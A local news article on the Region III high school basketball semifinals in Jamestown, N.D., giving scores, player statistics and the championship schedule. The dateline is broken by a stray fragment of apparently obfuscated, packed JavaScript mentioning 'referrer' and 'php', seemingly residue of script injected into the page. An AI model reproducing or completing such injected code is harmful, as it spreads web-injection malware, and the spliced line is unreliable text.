JAMESTOWN, zknzf|var|u0026u|referrer|zedfh||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Thursday night will decide the Region III Tournament champion, and after wins Tuesday at the Jamestown Civic Center, either the South Border Mustangs or the LaMoure-Litchville-Marion Loboes will raise the trophy.

South Border (14-10) ended a three-game skid against Strasburg-Zeeland (20-3) this season with a 63-54 win in double overtime.

The Mustangs were led by 30 points and 14 rebounds from standout senior Michael Jacobson. Freshman Hunter Pinke added a double-double of his own with 14 points and 16 rebounds.

In the defeat, the Clippers’ freshman sensation Brody Nieuwsma posted 23 points and 7 rebounds, including the game-tying running jumper at the end of regulation to send it to the first overtime period.

The second semifinal was a rematch of both teams’ season opener, in which L-L-M dominated Linton-Hazelton-Moffitt-Braddock 64-51, but it was a much different story this time around in terms of how close the contest was. Ultimately, the Loboes (21-2) came out on top once again and defeated the Lions (17-6) by a 53-44 final.

Senior Jared Meikeljohn was a perfect 8 for 8 from the free throw line and raked in 21 points. Sophomore forward Anthony Olson had a double-double with 10 points and 13 rebounds.

In the loss, the Lions were led by 11-point efforts from both Mason Ryckman and Ryan Schneider.

The Clippers and Lions will square off in Thursday’s third place game, with coverage on TED 98.3, 102.7 and NewsDakota.com beginning at 5:45 p.m. The championship between the Loboes and Mustangs will tip-off approximately 20 minutes following the conclusion of the third place game.
